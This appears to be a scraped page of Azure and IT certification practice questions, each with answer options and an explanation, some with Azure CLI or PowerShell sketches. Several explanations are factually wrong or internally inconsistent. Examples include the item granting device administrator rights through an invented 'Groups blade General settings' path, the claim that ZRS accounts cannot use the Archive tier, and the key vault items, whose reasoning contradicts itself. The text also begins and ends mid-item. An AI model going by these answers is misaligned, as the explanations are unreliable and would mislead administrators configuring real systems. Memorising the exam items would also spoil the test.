An Azure Internal Load Balancer (ILB) is used as a listener for a SQL Server Always On availability group to direct traffic to the active primary node. However, the solution fails because: The health probe must use port 59999 (or a custom probe port specified in SQL Server) instead of port 1433. Port 1433 is used for client connections to SQL Server, not for health probes. The health probe should check the availability of the primary replica by targeting the SQL Server listener probe port (typically 59999) rather than using HTTP. Correct Approach: To properly configure the Internal Load Balancer (ILB) listener, you should create a TCP health probe on the availability group’s probe port (e.g., 59999), ensure the SQL Server instances are correctly configured to respond to the probe requests, and associate the health probe with the backend pool of the load balancer. Why the solution does NOT meet the goal: 1) HTTP probes are not used for SQL Always On availability groups; a TCP probe is required. 2) Port 1433 is for SQL client connections, not for health monitoring. 3) The correct port for SQL Always On health probes is typically 59999 (or a custom port set in SQL Server).
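A minimal sketch of the correct probe, assuming a hypothetical internal load balancer named SqlIlb in resource group RG1 and the conventional probe port 59999:

# Create a TCP health probe on the availability group's probe port.
az network lb probe create \
  --resource-group RG1 \
  --lb-name SqlIlb \
  --name SqlAoProbe \
  --protocol Tcp \
  --port 59999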
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as the listener for the availability group. Solution: You set Session persistence to Client IP. Does the solution meet the goal?
Yes
No
An Azure Internal Load Balancer (ILB) is used as a listener for a SQL Server Always On availability group to direct traffic to the primary replica. However, setting Session Persistence to “Client IP” does NOT meet the goal because: SQL Server Always On requires a TCP health probe to detect the primary replica, and session persistence settings do not affect failover behavior. The ILB must correctly redirect traffic to the active primary replica based on the health probe status, not client IP persistence. Session persistence (Client IP) only ensures that a client’s connection goes to the same backend server, which does not help with SQL Always On failover scenarios. Correct Approach: To properly configure the Internal Load Balancer (ILB) listener, you should use a TCP health probe on the availability group’s probe port (typically 59999), configure the ILB with a backend pool containing the SQL Server VMs, ensure the SQL Server instances respond to the health probe for correct failover handling, and set “Floating IP (Direct Server Return)” to Enabled for proper routing. Why the solution does NOT meet the goal: 1) Session persistence (Client IP) does not help with SQL Always On failover; the ILB must dynamically route traffic to the active primary replica based on health probes. 2) The ILB requires a TCP health probe to determine which SQL instance is currently active. 3) Session persistence settings do not affect SQL Always On functionality, as connections must always be routed to the active primary, not a fixed VM.
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as a listener for the availability group. Solution: You enable Floating IP. Does the solution meet the goal?
Yes
No
When configuring an Azure Internal Load Balancer (ILB) as a listener for a Microsoft SQL Server Always On availability group, enabling Floating IP is required for proper failover handling. Why is Floating IP needed? Floating IP (Direct Server Return) ensures traffic is directed to the active primary replica of the Always On availability group. Without Floating IP, the ILB would not correctly route client connections after a failover. This setting allows the same frontend IP to be used across multiple SQL Server VMs without interruption. Correct Configuration Steps: To properly configure the ILB as a listener for SQL Always On, you should enable Floating IP on the ILB rule for the availability group listener, use a TCP health probe on the availability group’s probe port (typically 59999), associate the ILB with a backend pool containing the SQL Server VMs, and ensure the SQL Server instances are correctly configured to respond to health probe requests. Why does this solution meet the goal? 1) SQL Server Always On requires Floating IP to properly route traffic to the active primary replica. 2) Without Floating IP, failover handling would not work correctly, causing connection disruptions. 3) Floating IP allows seamless redirection of traffic, ensuring clients always connect to the active primary instance.
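A sketch of the load-balancing rule with Floating IP enabled, assuming a hypothetical ILB named SqlIlb with a frontend configuration, backend pool, and TCP probe already defined (all names below are illustrative; 1433 is the SQL listener port):

# Load-balancing rule for the listener: Floating IP (Direct Server Return) enabled.
az network lb rule create \
  --resource-group RG1 \
  --lb-name SqlIlb \
  --name SqlAoListenerRule \
  --protocol Tcp \
  --frontend-port 1433 \
  --backend-port 1433 \
  --frontend-ip-name LoadBalancerFrontEnd \
  --backend-pool-name SqlBackendPool \
  --probe-name SqlAoProbe \
  --floating-ip true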
You plan to create an Azure Storage account in the Azure region of East US 2. You need to create a storage account that meets the following requirements: replicates synchronously, and remains available if a single data center in the region fails. How should you configure the storage account? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Replication:
Geo-redundant storage (GRS)
Locally-redundant storage (LRS)
Read access Geo-redundant storage (RA-GRS)
Zone-redundant storage (ZRS)
When choosing an Azure Storage account replication type, the key requirements to meet are: 1) Replicates synchronously: data must be instantly copied to multiple locations without delay. 2) Remains available if a single data center fails: data must be distributed across multiple data centers within the same Azure region. Why is ZRS the correct choice? Zone-Redundant Storage (ZRS) synchronously replicates data across multiple availability zones within the same Azure region. If one data center (availability zone) fails, the storage remains available from the other zones. ZRS meets both requirements: synchronous replication and data center failure resilience. Why not the other options? Geo-Redundant Storage (GRS): Replication to the secondary region is asynchronous (not instant). Data is replicated to a secondary region, but there is no immediate failover if the primary region has an issue. Does not guarantee availability if a single data center fails. Locally-Redundant Storage (LRS): Replicates data only within a single data center. If the data center fails, the data may become unavailable or be lost. Does not provide high availability. Read-Access Geo-Redundant Storage (RA-GRS): Same as GRS, but allows read access to the secondary region. Replication is still asynchronous, and failover is not automatic.
You plan to create an Azure Storage account in the Azure region of East US 2. You need to create a storage account that meets the following requirements: replicates synchronously, and remains available if a single data center in the region fails. How should you configure the storage account? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Account type:
Blob Storage
Storage (general purpose v1)
StorageV2 (general purpose v2)
When selecting an Azure Storage account type, we need to ensure it meets the following requirements: 1) Replicates synchronously: data must be copied instantly across multiple locations. 2) Remains available if a single data center fails: the storage must support Zone-Redundant Storage (ZRS), which distributes data across multiple availability zones within the same region. Why is StorageV2 (general purpose v2) the correct choice? StorageV2 supports ZRS, which ensures synchronous replication across multiple availability zones. StorageV2 is the latest and recommended storage type, offering enhanced performance, security, and cost-efficiency. It supports all storage services (Blobs, Files, Queues, and Tables). Why not the other options? Blob Storage: Only supports blob data (not all storage services). Does not support ZRS for all access tiers, meaning it may not meet the high availability requirement. Storage (general purpose v1): Older version, lacking ZRS support and some advanced features. Less efficient in terms of performance and cost compared to StorageV2.
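Putting both answers together, a sketch of creating such an account from the CLI (the account and resource group names are illustrative):

# StorageV2 account with zone-redundant replication in East US 2.
az storage account create \
  --name thetechblackboardzrs01 \
  --resource-group RG1 \
  --location eastus2 \
  --kind StorageV2 \
  --sku Standard_ZRS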
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage accounts can be switched to geo-redundant storage (GRS). Which storage accounts should you identify?
storage1 only
storage2 only
storage3 only
storage4 only
storage1 and storage4 only
storage2 and storage3 only
To switch a storage account to Geo-Redundant Storage (GRS), it must meet the following requirements: 1) It must use Locally-Redundant Storage (LRS) as the current replication type. An LRS-to-GRS upgrade is possible; a ZRS-to-GRS upgrade is not. 2) It must be a supported storage account type (not all storage types support GRS). Blob Storage and StorageV2 support GRS; File Storage (Premium) does not support GRS. Why is Storage2 the only correct answer? Storage2 meets both conditions: it uses LRS (which can be upgraded to GRS), and it uses Blob Storage, which supports GRS. Storage1 and Storage3 use ZRS, which cannot be changed to GRS. Storage4 uses Premium LRS, which does not support GRS.
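For an eligible account such as storage2, the redundancy change itself is a simple SKU update; the resource group name below is an assumption:

# Convert storage2 from LRS to geo-redundant storage.
az storage account update --name storage2 --resource-group RG1 --sku Standard_GRS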
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage account can be converted to zone-redundant storage (ZRS) replication by requesting a live migration from Azure support. Which storage accounts should you identify?
storage1 only
storage2 only
storage3 only
storage4 only
To be eligible for live migration to Zone-Redundant Storage (ZRS), a storage account must meet these conditions: 1) It must currently use Locally-Redundant Storage (LRS). Azure allows LRS-to-ZRS migration via a support request; Geo-Redundant Storage (GRS) cannot be directly converted to ZRS. 2) It must be a supported storage account type. StorageV2 (general purpose v2) supports ZRS migration; Blob Storage and Storage (general purpose v1) do not support live migration to ZRS. Why is Storage2 the only correct answer? Storage2 meets both conditions: it currently uses LRS, which can be converted to ZRS via Azure support, and it is a StorageV2 account, which supports ZRS. Storage1 and Storage3 use GRS/RA-GRS, which cannot be converted directly to ZRS. Storage4 is a Blob Storage account, which does not support ZRS migration.
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage accounts support moving data to the Archive access tier. Which storage accounts should you use?
storage1 only
storage2 only
storage3 only
storage4 only
To move data to the Archive access tier, a storage account must meet the following conditions: 1) It must be either StorageV2 (general purpose v2) or Blob Storage; StorageV1 does not support the Archive tier. 2) It must support blob storage access tiers (Hot, Cool, and Archive); only Blob Storage and StorageV2 accounts allow data to be moved to the Archive tier. 3) The replication type does not by itself enable the Archive tier, but the tier can be used with LRS, GRS, and RA-GRS storage accounts. Why is Storage4 the only correct answer? Storage4 meets both conditions: it is a Blob Storage account, which supports the Archive access tier, and it uses RA-GRS, which does not prevent Archive tier usage. Storage1 and Storage3 are StorageV1 accounts, which do not support the Archive tier. Storage2 uses ZRS, which does not support the Archive tier.
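Once data lives in a supporting account such as storage4, individual blobs can be moved to Archive; the container and blob names below are hypothetical:

# Move a blob in storage4 to the Archive access tier.
az storage blob set-tier \
  --account-name storage4 \
  --container-name reports \
  --name report-2023.csv \
  --tier Archive \
  --auth-mode login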
You have an Azure subscription that contains the storage accounts shown in the following table. You plan to manage the data stored in the accounts by using lifecycle management rules. To which storage accounts can you apply lifecycle management rules?
storage1 only
storage1 and storage2 only
storage3 and storage4 only
storage1, storage2, and storage3 only
storage1, storage2, storage3, and storage4
Lifecycle management rules in Azure allow automated movement of data between storage tiers (Hot, Cool, and Archive) or deletion of old data. For lifecycle management to be applicable, a storage account must meet these conditions: 1) The storage account must be one of the following types: StorageV2 (general purpose v2), Blob Storage, or Block Blob Storage, all of which support lifecycle rules; StorageV1 (general purpose v1) does not support lifecycle rules. 2) Premium performance is supported only for premium block blob accounts, where the rules apply to block blobs. Why are Storage1, Storage2, and Storage3 the correct answer? Storage1 (StorageV2 + Standard) supports lifecycle rules. Storage2 (Blob Storage + Standard) supports lifecycle rules. Storage3 (Block Blob Storage + Premium) supports lifecycle rules (for block blobs only). Storage4 (StorageV1 + Premium) does NOT support lifecycle rules.
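As a sketch, a rule set defined in a local JSON file (assumed here to exist as policy.json, for example moving blobs to the Cool tier after 30 days) can be applied to an eligible account such as storage1; the resource group name is an assumption:

# Apply lifecycle management rules from policy.json to storage1.
az storage account management-policy create \
  --account-name storage1 \
  --resource-group RG1 \
  --policy @policy.json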
While making configuration changes to your SOHO router, you discover that WPA3 is not available. What should you do?
Update the router’s firmware.
Configure content filtering.
Configure port forwarding.
Update the SSID.
If WPA3 is not available in your SOHO (Small Office/Home Office) router’s wireless security settings, the most likely reason is that your router’s firmware is outdated. WPA3 is a newer wireless security protocol, and firmware updates often include support for newer standards like WPA3, along with performance improvements and security patches. Why the other options are incorrect: Configure content filtering: This controls what websites or services can be accessed but does not affect available wireless security protocols. Configure port forwarding: This allows external devices to access services inside the network, unrelated to Wi-Fi security settings. Update the SSID: The SSID is the name of the wireless network. Changing it doesn’t enable WPA3 or impact encryption protocols. Summary: Updating the firmware is the correct and necessary step to enable newer features like WPA3, provided your router hardware supports it.
You have an Azure subscription that contains a Microsoft Entra ID tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1. An administrator reports that she is unable to grant access to AKS1 to the users in contoso.com. You need to ensure that access to AKS1 can be granted to the contoso.com users. What should you do first?
From contoso.com, modify the Organization relationships settings.
From contoso.com, create an OAuth 2.0 authorization endpoint.
Recreate AKS1
From AKS1, create a namespace.
Azure Kubernetes Service (AKS) relies on Microsoft Entra ID (formerly Azure AD) for authentication and access control. If an administrator is unable to grant access to users from contoso.com, it likely means that AKS is not properly integrated with Entra ID for authentication. To fix this issue, you need to enable Entra ID authentication by configuring an OAuth 2.0 authorization endpoint in Entra ID. This allows AKS to use Entra ID-based RBAC (Role-Based Access Control) for authentication. Why is an OAuth 2.0 Authorization Endpoint Required? OAuth 2.0 is the industry standard for authentication and authorization. AKS requires Microsoft Entra ID integration to authenticate users. Without configuring the OAuth 2.0 authorization endpoint, AKS cannot validate access requests from Entra ID users. Steps to Configure Microsoft Entra ID Authentication for AKS: 1) Register AKS in Microsoft Entra ID: Go to Microsoft Entra ID > App registrations > New registration and register a new application for AKS authentication. 2) Create an OAuth 2.0 Authorization Endpoint: In Microsoft Entra ID, go to Endpoints, copy the OAuth 2.0 token endpoint, and configure it in AKS. 3) Enable Entra ID-based authentication in AKS: Use the following Azure CLI command to integrate Entra ID with AKS: az aks update -g MyResourceGroup -n AKS1 --enable-aad Then assign RBAC roles to users using kubectl or the Azure CLI. Why Not the Other Options? (A) Modify the Organization Relationships Settings: This setting is used for B2B/B2C collaboration and cross-tenant access, not for granting Entra ID users access to AKS. (C) Recreate AKS1: Recreating AKS is not necessary. The issue is with authentication settings, not the cluster itself. (D) Create a Namespace in AKS: Namespaces organize workloads inside the cluster but do not integrate the cluster with Entra ID, so they do not enable granting access to contoso.com users.
You have a resource group named RG1 that contains several unused resources. You need to use the Azure CLI to remove RG1 and all its resources, without requiring a confirmation. Which command should you use?
az group delete --name rg1 --no-wait --yes
az group deployment delete --name rg1 --no-wait
az group update --name rg1 --remove
az group wait --deleted --resource-group rg1
The az group delete command is used to delete a resource group and all its associated resources in Azure. --name RG1 specifies the name of the resource group to be deleted (RG1). --no-wait makes the command run asynchronously, meaning it does not block the terminal while deleting. --yes skips the confirmation prompt, ensuring the deletion happens without manual intervention. This combination permanently removes RG1 and all the resources inside it without requiring user confirmation. Why Not the Other Options? (B) az group deployment delete --name RG1 --no-wait: This command only deletes a deployment from the resource group, not the resource group itself. The resource group and its resources will still exist. (C) az group update --name RG1 --remove: az group update is used to modify a resource group’s properties, not delete it. --remove does not delete the entire resource group, only specific properties. (D) az group wait --deleted --resource-group RG1: az group wait is used to wait until a resource group is deleted, but it does not delete the resource group itself. This command would only make sense after running az group delete.
You have an Azure subscription named Subscription1. Subscription1 contains the resource groups in the following table. RG1 has a web app named WebApp1. WebApp1 is located in West Europe. You move WebApp1 to RG2. What is the effect of the move?
The App Service plan for WebApp1 remains in West Europe. Policy2 applies to WebApp1
The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1.
The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1.
The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1.
When you move WebApp1 from RG1 (West Europe) to RG2 (North Europe), the following effects occur: The web app’s physical location does not change. WebApp1 is hosted on an App Service Plan, which determines its region. Moving WebApp1 to a different resource group does not change its App Service Plan’s region. Since the App Service Plan is in West Europe, WebApp1 will continue to run in West Europe. The resource group policies are applied based on the new group. Each resource group has its own policies that affect the resources within it. When WebApp1 moves to RG2, it will now inherit the policies of RG2 (which is Policy2). Why Not the Other Options? (B) The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1: Incorrect because the App Service Plan does not move when transferring a web app between resource groups; only the web app moves, and it remains in the same region. (C) The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1: Incorrect because Policy1 belongs to RG1, but WebApp1 is now in RG2, so it follows Policy2 from RG2. (D) The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1: Incorrect because the App Service Plan stays in West Europe, and WebApp1 inherits Policy2 (not Policy1).
You have a Microsoft Entra tenant named contoso.com. You collaborate with an external partner named thetechblackboard.com. You plan to invite users in thetechblackboard.com to the contoso.com tenant. You need to ensure that invitations can be sent only to thetechblackboard.com users. What should you do in the Microsoft Entra admin center?
From Cross-tenant access settings, configure the Tenant restrictions settings.
From Cross-tenant access settings, configure the Microsoft cloud settings.
From External collaboration settings, configure the Guest user access restrictions settings.
From External collaboration settings, configure the Collaboration restrictions settings.
When collaborating with an external partner (thetechblackboard.com), you need to restrict guest invitations only to users from that domain. This is done by configuring Collaboration restrictions in the External collaboration settings. External collaboration settings allow control over how external users can be invited and what permissions they have. Collaboration restrictions let you define allowed or blocked domains for guest invitations. To allow only users from thetechblackboard.com, you can add “thetechblackboard.com” to the allowed domains list and block all other domains from receiving invitations. This ensures that invitations can only be sent to users from thetechblackboard.com. Why Not the Other Options? (A) From Cross-tenant access settings, configure the Tenant restrictions settings: Incorrect because Tenant Restrictions control which tenants your users can access, not who can be invited as guests. Correct use case: restricting your users from accessing external Microsoft Entra tenants. (B) From Cross-tenant access settings, configure the Microsoft cloud settings: Incorrect because Microsoft cloud settings manage how different Microsoft cloud services (e.g., Office 365, Azure AD B2B) interact across tenants, not guest invitations. (C) From External collaboration settings, configure the Guest user access restrictions settings: Incorrect because Guest User Access Restrictions control guest permissions once invited but do not restrict which domains can receive invitations. Correct use case: limiting what invited guests can do inside your tenant (e.g., read-only access).
Your company has a Microsoft Entra ID tenant named thetechblackboard.onmicrosoft.com and a public DNS zone for thetechblackboard.com. You added the custom domain name thetechblackboard.com to Microsoft Entra ID. You need to verify that Azure can verify the domain name. What DNS record type should you use?
A
CNAME
SOA
MX
When adding a custom domain name (e.g., thetechblackboard.com) to Microsoft Entra ID, Azure requires domain verification to ensure ownership. This is done by adding a DNS record in the public DNS zone (thetechblackboard.com). Azure provides two options for verification: an MX (Mail Exchanger) record or a TXT (Text) record. The MX record is commonly used because: It is required for email services, making it a widely recognized method of verification. It does not interfere with existing email configurations if it has a priority of 0 and no mail server specified. When setting up the custom domain in Microsoft Entra ID, Microsoft provides an MX record like: Priority: 0, Host: @, Mail Server: MS=ms########, TTL: 3600 (or default). Once this record is added and propagated, Azure verifies the domain automatically. Why Not the Other Options? (A) A (Address) Record: Incorrect because A records are used to map a domain to an IP address, typically for websites or servers. Microsoft does not use A records for domain verification in Entra ID. (B) CNAME (Canonical Name) Record: Incorrect because CNAME records alias one domain to another (e.g., www.thetechblackboard.com -> thetechblackboard.com). Microsoft Entra ID does not use CNAME for domain verification. (C) SOA (Start of Authority) Record: Incorrect because SOA records store administrative information about the DNS zone (such as the primary name server and refresh settings), are created automatically with the zone, and are not used for domain verification.
You sign up for Microsoft Entra ID P2. You need to add a user named admin@contoso.com as an administrator on all the computers that will be joined to the Entra domain. What should you configure in Microsoft Entra ID?
Device settings from the Devices blade
Providers from the MFA Server blade
User settings from the Users blade
General settings from the Groups blade
To ensure that admin@contoso.com is automatically added as an administrator on all computers that will be joined to the Entra domain, you need to configure settings in the Groups blade under General settings. Microsoft Entra ID allows you to assign administrator roles to users automatically when devices are joined to the domain. This is done by: (1) using the “Device Administrator” role in Microsoft Entra ID, which grants users local administrator privileges on all domain-joined devices and ensures that admin@contoso.com is automatically an administrator on every computer joined to the Entra domain; and (2) configuring role assignments in the Groups blade, where you can create a security group in Groups > General settings, assign the Device Administrator role to that group, and add admin@contoso.com to it so that they automatically receive admin rights on all joined devices. Why Not the Other Options? (A) Device settings from the Devices blade: incorrect because this blade is used to manage device policies (e.g., allowing/disallowing device joins) rather than assigning administrator rights. (B) Providers from the MFA Server blade: incorrect because this is related to Multi-Factor Authentication (MFA) settings, not device administration. (C) User settings from the Users blade: incorrect because the Users blade is for managing individual users, not assigning admin roles to all domain-joined devices. Admin privileges need to be set at the group level to apply to multiple users/devices automatically.
You have the following resources deployed in Azure. There is a requirement to connect TDVnet1 and TDVnet2. What should you do first?
Create virtual network peering
Change the address space of TDVnet2.
Transfer TDVnet1 to TD2.
Transfer VM1 to TD2.
To connect TDVnet1 (10.1.0.0/16) and TDVnet2 (10.10.0.0/18), the best option is to use Virtual Network (VNet) peering. VNet peering allows two virtual networks to connect seamlessly in Azure without requiring a VPN or additional hardware. It provides low-latency, high-bandwidth private connectivity and secure communication between resources in different VNets, and it requires no overlapping IP address spaces (which is already ensured in this case). Why Not the Other Options? (B) Change the address space of TDVnet2: incorrect because there is no address space conflict between TDVnet1 (10.1.0.0/16) and TDVnet2 (10.10.0.0/18). Address space changes would only be required if there were an overlap (which is not the case here). (C) Transfer TDVnet1 to TD2: incorrect because Azure Virtual Networks (VNets) are tied to a specific subscription and tenant. You cannot directly transfer a VNet between tenants; cross-tenant connections should instead be managed using VNet peering or VPN connections. (D) Transfer VM1 to TD2: incorrect because moving VM1 would not connect the two VNets. It would just relocate the VM, which doesn’t solve the connectivity issue between VNets. VMs within the same VNet can already communicate, but VNet-to-VNet connectivity requires peering or a VPN.
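A minimal sketch of that first step, assuming both virtual networks live in a resource group named RG1 (placeholder) and the Az.Network module is installed; peering must be created in both directions:

$vnet1 = Get-AzVirtualNetwork -Name "TDVnet1" -ResourceGroupName "RG1"
$vnet2 = Get-AzVirtualNetwork -Name "TDVnet2" -ResourceGroupName "RG1"
# Peer TDVnet1 -> TDVnet2 and TDVnet2 -> TDVnet1 (both links are required for connectivity)
Add-AzVirtualNetworkPeering -Name "TDVnet1-to-TDVnet2" -VirtualNetwork $vnet1 -RemoteVirtualNetworkId $vnet2.Id
Add-AzVirtualNetworkPeering -Name "TDVnet2-to-TDVnet1" -VirtualNetwork $vnet2 -RemoteVirtualNetworkId $vnet1.Id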
Your organization has deployed multiple Azure virtual machines configured to run as web servers and an Azure public load balancer named TD1. There is a requirement that TD1 must consistently route a user’s requests to the same web server every time they access it. What should you configure?
Hash based
Session persistence: None
Session persistence: Client IP
Health probe
When multiple Azure virtual machines (VMs) are configured as web servers behind an Azure public load balancer, the load balancer distributes incoming traffic across the available backend servers. If a user makes multiple requests, the load balancer may route each request to a different backend server, which can cause session inconsistencies. To ensure that a user’s request is always routed to the same web server, you should configure Session Persistence: Client IP. How Session Persistence: Client IP Works Client IP persistence (also called Source IP affinity) ensures that all requests from a specific client IP address are always sent to the same backend VM. This is useful for web applications that store session-related information on a specific server and require continuity for the user experience. Without session persistence, a user’s requests could be routed to different servers, potentially losing session data. Why Other Options Are Incorrect: (a) Hash-based: Uses a hash algorithm to distribute traffic dynamically and does not guarantee persistence to a specific backend server. (b) Session persistence: None: Means requests are distributed without any stickiness, potentially sending different requests from the same client to different backend VMs. (d) Health probe: Used to monitor backend VM health but does not control session persistence.
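A sketch of how this could be set on an existing rule (assuming TD1 sits in a resource group named RG1 and already has at least one load-balancing rule; names are placeholders):

$lb = Get-AzLoadBalancer -Name "TD1" -ResourceGroupName "RG1"
# "SourceIP" corresponds to "Session persistence: Client IP" in the portal
$lb.LoadBalancingRules[0].LoadDistribution = "SourceIP"
# Push the updated configuration back to Azure
Set-AzLoadBalancer -LoadBalancer $lb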
You have an Azure subscription that contains the resources shown in the following table. You plan to use an Azure key vault to provide a secret to app1. What should you create for app1 to access the key vault, and from which key vault can the secret be used? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Create a:
Managed Identity
Private Endpoint
Service Principal
User Account
To allow App1 (a container app in East US) to access a secret from Azure Key Vault, we need to determine what authentication method App1 should use to securely access Azure Key Vault, and which key vault App1 should retrieve the secret from. Step 1: Choosing the authentication method. Managed Identity is the best practice for Azure services to access Key Vault securely without storing credentials. Managed identities are automatically managed by Azure and do not require storing or rotating secrets manually, and App1 can use Azure Role-Based Access Control (RBAC) to get permissions for the key vault. The other options are incorrect: Private Endpoint is used for network access control, not authentication; Service Principal requires manual credential management (client ID and secret/certificate), making it less secure compared to managed identities; User Account should not be used by apps to authenticate, due to security and automation concerns. Step 2: Selecting the key vault. Vault1 (East US, same region as App1): since App1 is in East US, the best practice is to use a key vault also in East US to reduce latency and ensure compliance, and Vault1 is in East US, making it the best choice. Vault2 (West US) is in a different region, which is not ideal. Vault3 (East US, but a different resource group) could work, but it’s best to keep resources in the same resource group for better management.
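A minimal sketch, assuming Vault1 uses Azure RBAC for authorization and that App1 already has a system-assigned managed identity whose principal ID you have at hand (the object ID below is a placeholder):

$vault = Get-AzKeyVault -VaultName "Vault1"
# Grant App1's managed identity read access to secrets in Vault1
New-AzRoleAssignment -ObjectId "<App1-managed-identity-principal-id>" -RoleDefinitionName "Key Vault Secrets User" -Scope $vault.ResourceId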
You want to clear all of your data and restore a Windows 10 PC’s operating system to a factory install before giving the PC to a charity. You’ve booted into WinRE. What is the name of Microsoft’s recovery option for reinstalling the OS and removing all user data and files?
Refresh your PC
Restore your PC
Reset your PC
Repair your PC
The “Reset Your PC” option in Windows 10 is the recovery tool you use to restore the system to its factory state. When you use this option, you can choose to remove all your personal data and files, effectively clearing all user information and applications, while reinstalling the operating system itself. This ensures that the PC is ready for a new user without any remnants of the previous owner’s data. Why the others are incorrect: Refresh Your PC: This was a feature in Windows 8, but it’s not present in Windows 10. In Windows 10, the equivalent functionality is handled by Reset Your PC. Restore Your PC: This is not the correct option in Windows 10. The term “restore” typically refers to restoring a system from a backup, but “Reset Your PC” is the tool that removes all data and reinstalls the OS. Repair Your PC: This option is used for fixing startup issues or other problems with Windows, but it does not reinstall the OS or clear data. It focuses on troubleshooting and fixing errors. Why “Reset Your PC” is the correct option: Using Reset Your PC is the proper method for cleaning the PC by removing all personal data and reinstalling the operating system. You can choose to either keep or remove your files, but for a clean slate, you would select the option to remove everything, ensuring all data is cleared.
You have an Azure subscription that contains the resources shown in the following table. You plan to use an Azure key vault to provide a secret to app1. What should you create for app1 to access the key vault, and from which key vault can the secret be used? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Use Secret From:
Vault 1 only
Vault 1 and Vault 2 only
Vault 1 and Vault 3 only
Vault 1, Vault 2, and Vault 3
To determine which Azure key vault(s) App1 can retrieve a secret from, we need to consider key vault access management (can App1 access key vaults across different locations and resource groups?) and cross-region access (can App1 retrieve secrets from key vaults located in different Azure regions?). Step 1: Key vault access management. Azure Key Vault supports access using a managed identity or a service principal, which allows an application to authenticate and retrieve secrets from multiple key vaults as long as App1 has the required permissions (e.g., a “Get Secrets” role) assigned on the key vaults and the key vaults allow access from App1’s identity (RBAC or access policies). Since App1 is a container app, it can access multiple Azure key vaults if permission is granted. Step 2: Cross-region access. Azure allows retrieving secrets from key vaults located in different Azure regions. This means App1 (East US) can access key vaults in East US (Vault1, Vault3) and West US (Vault2) as long as permissions are set. Thus, App1 can use secrets from all three key vaults: Vault1 (East US, same region as App1), Vault2 (West US, cross-region access is allowed), and Vault3 (East US, different resource group, but still accessible if permissions are granted).
You have an Azure subscription that contains a storage account named storage1. You need to ensure that the access keys for storage1 rotate automatically. What should you configure?
a backup vault
redundancy for storage1
lifecycle management for storage1
An Azure key vault
Recovery Services vault
To automatically rotate access keys for storage1, you need a secure and automated way to manage these keys. The best approach is to use Azure Key Vault. Why Azure Key Vault? Azure Key Vault provides automated key rotation for storage account access keys. It allows you to securely store and manage access keys, enable automatic rotation of storage account keys, integrate with Azure policies for key management, and monitor and control access to the keys. Using Key Vault’s managed storage account keys feature, you can set up automatic key rotation, eliminating the need for manual key updates. Why Not the Other Options? A backup vault – used for backing up Azure workloads, not for managing key rotation. Redundancy for storage1 – this improves data availability but does not rotate keys. Lifecycle management – manages the data lifecycle (e.g., moving blobs to the Archive tier) but does not handle key rotation. A Recovery Services vault – used for disaster recovery and backups, not key management.
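A rough sketch of the managed storage account keys feature (assuming a key vault named kv1 already exists, Key Vault has been granted the required permissions on storage1, and storage1 sits in a resource group named RG1; all names are placeholders):

$sa = Get-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1"
# Let the key vault manage the storage account keys and regenerate the active key every 90 days
Add-AzKeyVaultManagedStorageAccount -VaultName "kv1" -AccountName "storage1" -AccountResourceId $sa.Id -ActiveKeyName "key1" -RegenerationPeriod ([System.TimeSpan]::FromDays(90))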
You have a general-purpose v1 Azure Storage account named storage1 that uses locally-redundant storage (LRS). You need to ensure that the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Create a new storage account
Configure object replication rules
Upgrade the account to general-purpose v2
Modify the Replication setting of storage1
To ensure that the data in storage1 is protected in case of a zone failure, you need to use zone-redundant storage (ZRS). However, your storage account is currently a general-purpose v1 (GPv1) account with locally-redundant storage (LRS), which only replicates data within a single data center and does not provide zone failure protection. Why upgrade to general-purpose v2 (GPv2)? Supports zone-redundant storage (ZRS) – GPv2 accounts support ZRS, which ensures that data is replicated across multiple zones in a region. Minimizes costs – upgrading to GPv2 does not require creating a new storage account or migrating data manually. Simplifies administration – after upgrading, you can modify the replication setting to ZRS, ensuring protection from zone failures. Improved performance and features – GPv2 provides better performance, lower costs, and access to new features like lifecycle management and the Cool/Archive tiers. Why Not the Other Options? Create a new storage account – while you could create a new GPv2 storage account with ZRS, this requires manual migration of data, increasing administrative effort. Configure object replication rules – object replication is for blob storage only and requires multiple storage accounts, adding unnecessary complexity. Modify the Replication setting of storage1 – GPv1 does not support ZRS, so you must upgrade to GPv2 first before modifying replication settings.
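The first step (the upgrade itself) can be done in place; a sketch assuming storage1 lives in a resource group named RG1 (placeholder):

# Upgrade the general-purpose v1 account to general-purpose v2 (no downtime; the upgrade is not reversible)
Set-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1" -UpgradeToStorageV2
# After the upgrade, the replication setting can be changed from LRS to ZRS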
You have an Azure web app named App1. App1 has the deployment slots shown in the following table: In webapp1-test, you test several changes to App1. You back up App1. You swap webapp1-test for webapp1-prod and discover that App1 is experiencing performance issues. You need to revert to the previous version of App1 as quickly as possible. What should you do?
Redeploy App1
Swap the slots
Clone App1
Restore the backup of App1
Azure App Service Deployment Slots allow you to create different environments (such as staging and production) within the same App Service instance. The key advantage of using deployment slots is the ability to swap them, enabling zero-downtime deployments and quick rollbacks. You initially deploy and test changes in webapp1-test (staging): Before swapping, the new version of App1 was running in webapp1-test, while the stable version was in webapp1-prod. You swap webapp1-test with webapp1-prod: The new (potentially unstable) version of App1 is now in production (webapp1-prod), and the previously stable version moves to webapp1-test. You detect performance issues in production: Since the new version has problems, you need to revert to the previous stable version as quickly as possible. Swapping the slots again immediately restores the previous stable version: Since the original production version is now in webapp1-test, swapping it back will restore the last working version to webapp1-prod, effectively rolling back the deployment instantly and without requiring a redeployment. Why not the other options? (a) Redeploy App1: Redeploying takes more time and might introduce new complications. Swapping is faster and ensures a working version is restored immediately. (c) Clone App1: Cloning creates a new instance of the app, which is unnecessary and time-consuming. You just need to revert to the 